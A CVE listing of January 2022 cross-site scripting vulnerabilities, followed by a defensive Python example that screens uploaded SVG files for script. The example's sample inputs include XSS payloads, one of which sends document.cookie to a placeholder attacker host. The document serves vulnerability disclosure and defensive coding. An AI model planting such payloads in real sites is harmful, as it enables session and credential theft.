Total: 21765 CVEs
| CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 | Description |
|---|---|---|---|---|---|---|
| CVE-2022-22124 | 1 Fit2cloud | 1 Halo | 2022-01-14 | 3.5 LOW | 5.4 MEDIUM | In Halo, versions v1.0.0 to v1.4.17 (latest) are vulnerable to stored cross-site scripting (XSS) in the profile image. An authenticated attacker can upload a carefully crafted SVG file that triggers arbitrary JavaScript in a victim's browser. |
| CVE-2021-38895 | 1 Ibm | 1 Security Verify Access | 2022-01-13 | 3.5 LOW | 5.4 MEDIUM | IBM Security Verify 10.0.0, 10.0.1.0, and 10.0.2.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI, altering the intended functionality and potentially leading to credential disclosure within a trusted session. IBM X-Force ID: 209563. |
| CVE-2021-46163 | 1 Kentico | 1 Kentico Cms | 2022-01-13 | 4.3 MEDIUM | 6.1 MEDIUM | Kentico Xperience 13.0.44 allows XSS via an XML document submitted to the Media Libraries subsystem. |
| CVE-2022-21648 | 1 Nette | 1 Latte | 2022-01-13 | 4.3 MEDIUM | 6.1 MEDIUM | Latte is an open source template engine for PHP. Since version 2.8.0 Latte has included a template sandbox; in affected versions a sandbox escape exists that allows injection into web pages generated from Latte, which may lead to XSS attacks. The issue is fixed in versions 2.8.8, 2.9.6 and 2.10.8. Users unable to upgrade should not accept template input from untrusted sources. |
| CVE-2021-46146 | 1 Mediawiki | 1 Mediawiki | 2022-01-13 | 3.5 LOW | 5.4 MEDIUM | An issue was discovered in MediaWiki before 1.35.5, 1.36.x before 1.36.3, and 1.37.x before 1.37.1. The WikibaseMediaInfo component is vulnerable to XSS via the caption fields for a given media file. |
| CVE-2021-46150 | 1 Mediawiki | 1 Mediawiki | 2022-01-13 | 3.5 LOW | 4.8 MEDIUM | An issue was discovered in MediaWiki before 1.35.5, 1.36.x before 1.36.3, and 1.37.x before 1.37.1. Special:CheckUserLog allows CheckUser XSS because of date mishandling, as demonstrated by an XSS payload in MediaWiki:October. |
| CVE-2021-40041 | 1 Huawei | 2 Ws318n-21, Ws318n-21 Firmware | 2022-01-13 | 1.9 LOW | 4.2 MEDIUM | There is a cross-site scripting (XSS) vulnerability in the HUAWEI WS318n product when processing network settings. Due to insufficient validation of user input, a local authenticated attacker could exploit this vulnerability by injecting special characters. A successful exploit could cause certain information disclosure. Affected product versions: WS318n-21 10.0.2.2, 10.0.2.5 and 10.0.2.6. |
| CVE-2021-46080 | 1 Vehicle Service Management System Project | 1 Vehicle Service Management System | 2022-01-13 | 3.5 LOW | 4.8 MEDIUM | A cross-site request forgery (CSRF) vulnerability exists in Vehicle Service Management System 1.0. A successful CSRF attack leads to a stored cross-site scripting vulnerability. |
| CVE-2021-36737 | 1 Apache | 1 Pluto | 2022-01-12 | 4.3 MEDIUM | 6.1 MEDIUM | The input fields of the Apache Pluto UrlTestPortlet are vulnerable to cross-site scripting (XSS) attacks. Users should migrate to version 3.1.1 of the v3-demo-portlet.war artifact. |
| CVE-2020-27428 | 1 Mit | 1 Scratch-svg-renderer | 2022-01-12 | 4.3 MEDIUM | 6.1 MEDIUM | A DOM-based cross-site scripting (XSS) vulnerability in Scratch-Svg-Renderer v0.2.0 allows attackers to execute arbitrary web scripts or HTML via a crafted sb3 file. |
| CVE-2021-36738 | 1 Apache | 1 Pluto | 2022-01-12 | 4.3 MEDIUM | 6.1 MEDIUM | The input fields in the JSP version of the Apache Pluto Applicant MVCBean CDI portlet are vulnerable to cross-site scripting (XSS) attacks. Users should migrate to version 3.1.1 of the applicant-mvcbean-cdi-jsp-portlet.war artifact. |
| CVE-2021-36739 | 1 Apache | 1 Pluto | 2022-01-12 | 4.3 MEDIUM | 6.1 MEDIUM | The "first name" and "last name" fields of the Apache Pluto 3.1.0 MVCBean JSP portlet maven archetype are vulnerable to cross-site scripting (XSS) attacks. |
| CVE-2021-44584 | 1 Emlog | 1 Emlog | 2022-01-12 | 4.3 MEDIUM | 6.1 MEDIUM | Cross-site scripting (XSS) vulnerability in index.php in emlog versions <= pro-1.0.7 allows remote attackers to inject arbitrary web script or HTML via the s parameter. |
| CVE-2021-45813 | 1 Slican | 1 Webcti | 2022-01-12 | 4.3 MEDIUM | 6.1 MEDIUM | SLICAN WebCTI 1.01 2015 is affected by a cross-site scripting (XSS) vulnerability. An attacker can steal the user's session by injecting malicious JavaScript code, leading to session hijacking and theft of the user's credentials. |
| CVE-2022-21650 | 1 Convos | 1 Convos | 2022-01-11 | 3.5 LOW | 5.4 MEDIUM | Convos is an open source multi-user chat that runs in a web browser. Files with an .svg extension cannot be used in Convos' chat window, but a file with an .html extension can be uploaded; uploading an SVG file under an .html extension bypasses the upload filter. This causes stored XSS: the attack is triggered when a user views the uploaded file, allowing an attacker to execute malicious scripts. Users are advised to update as soon as possible. |
| CVE-2021-46074 | 1 Vehicle Service Management System Project | 1 Vehicle Service Management System | 2022-01-11 | 3.5 LOW | 4.8 MEDIUM | A stored cross-site scripting (XSS) vulnerability exists in Sourcecodester Vehicle Service Management System 1.0 via the Settings section of the login panel. |
| CVE-2021-46073 | 1 Vehicle Service Management System Project | 1 Vehicle Service Management System | 2022-01-11 | 3.5 LOW | 4.8 MEDIUM | A stored cross-site scripting (XSS) vulnerability exists in Sourcecodester Vehicle Service Management System 1.0 via the User List section of the login panel. |
| CVE-2021-42841 | 1 Practo | 1 Insta Hms | 2022-01-11 | 4.3 MEDIUM | 6.1 MEDIUM | Insta HMS before 12.4.10 is vulnerable to XSS because of improper validation of user-supplied input by multiple scripts. A remote attacker could exploit this vulnerability via a crafted URL to execute script in a victim's web browser within the security context of the hosting web site once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. |
| CVE-2021-43861 | 1 Mermaid Project | 1 Mermaid | 2022-01-11 | 3.5 LOW | 5.4 MEDIUM | Mermaid is a JavaScript-based diagramming and charting tool that uses Markdown-inspired text definitions and a renderer to create and modify complex diagrams. Prior to version 8.13.8, malicious diagrams can run JavaScript code on diagram readers' machines. Users should upgrade to version 8.13.8 to receive a patch. There are no known workarounds aside from upgrading. |
| CVE-2021-46071 | 1 Vehicle Service Management System Project | 1 Vehicle Service Management System | 2022-01-10 | 3.5 LOW | 4.8 MEDIUM | A stored cross-site scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Category List section of the login panel. |
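Two entries above (CVE-2022-22124 in Halo and CVE-2022-21650 in Convos) describe the same pattern: a user-uploaded SVG is stored and later rendered in the site's origin, so script inside it runs as the viewing user; in the Convos case the upload filter was keyed on the file extension, so SVG content under an .html name slipped through. The following is an added example, not code from Halo, Convos or this listing, of the three checks a reviewer would ask for on an upload path: classify the file by content rather than extension, reject SVG that carries active content, and serve stored uploads so a browser does not render them in the application origin. All function names and the sample uploads are constructed for illustration.

```python
"""Upload-side checks for stored XSS via SVG (added example, hypothetical API).

1. sniff_is_svg:        decide by parsed content whether an upload is SVG,
                        so renaming the file to .html changes nothing.
2. find_active_content: reject SVG that can execute script.
3. download_headers:    serve stored uploads as attachments with nosniff and
                        a restrictive CSP, so the browser never executes
                        them in the site's origin even if a check is wrong.
Production code should parse with defusedxml (entity-expansion protection);
the standard library is used here so the example runs offline.
"""
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"

# Constructed sample uploads; none of these are real files from either project.
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10"><circle r="5"/></svg>'
SCRIPT_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><script>alert(document.cookie)</script></svg>'
ONLOAD_SVG = b'<svg xmlns="http://www.w3.org/2000/svg" onload="fetch(\'//attacker.invalid/\'+document.cookie)"/>'
HREF_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
            b'<a xlink:href="java&#9;script:alert(1)"><text>x</text></a></svg>')
PNG_BYTES = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16


def sniff_is_svg(data: bytes) -> bool:
    """True if the bytes parse as XML whose root element is svg in the SVG namespace."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return False
    return root.tag == f"{{{SVG_NS}}}svg"


def find_active_content(data: bytes) -> list[str]:
    """Return the reasons an SVG could execute script; an empty list means clean.

    Checked: <script>, <foreignObject> (embeds arbitrary HTML), on* event
    handler attributes, and href/xlink:href with a javascript: scheme.
    The parser has already decoded XML entities, so &#106;avascript: is seen
    as javascript:; whitespace and control characters inside the scheme are
    stripped the way browsers do before comparing.
    """
    reasons = []
    for elem in ET.fromstring(data).iter():
        local = elem.tag.rsplit("}", 1)[-1].lower()
        if local in ("script", "foreignobject"):
            reasons.append(f"element <{local}>")
        for attr, value in elem.attrib.items():
            attr_local = attr.rsplit("}", 1)[-1].lower()
            if attr_local.startswith("on"):
                reasons.append(f"event handler {attr_local}")
            if attr_local == "href":
                scheme = re.sub(r"[\s\x00-\x1f]", "", value).lower()
                if scheme.startswith("javascript:"):
                    reasons.append(f"javascript: URL in {attr}")
    return reasons


def accept_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Upload policy that depends only on content; the filename is ignored on purpose.

    Returns (accepted, kind_or_reason).
    """
    if sniff_is_svg(data):
        problems = find_active_content(data)
        if problems:
            return False, "active content in SVG: " + "; ".join(problems)
        return True, "svg"
    if data.startswith(b"\x89PNG\r\n\x1a\n"):
        return True, "png"
    return False, "unrecognised content"


def download_headers(kind: str, filename: str) -> dict[str, str]:
    """Response headers for serving a stored upload.

    attachment disposition stops direct navigation from rendering the file,
    nosniff stops the browser from reinterpreting the body as HTML, and the
    CSP blocks script and sandboxes the document if it is rendered anyway.
    """
    content_type = {"svg": "image/svg+xml", "png": "image/png"}[kind]
    safe_name = re.sub(r"[^A-Za-z0-9._-]", "_", filename)
    return {
        "Content-Type": content_type,
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }


if __name__ == "__main__":
    for name, blob in [("avatar.svg", BENIGN_SVG), ("avatar.html", SCRIPT_SVG),
                       ("avatar.html", ONLOAD_SVG), ("link.svg", HREF_SVG), ("pic.png", PNG_BYTES)]:
        print(name, accept_upload(name, blob))
```

The element and attribute checks are a denylist and will lag behind the browsers, which is why the serving headers are not optional: an `<img src>` reference never executes SVG script, but a direct navigation to the stored file, or an `<object>`/`<iframe>` embedding, does unless the file is served as an attachment in a sandboxed context.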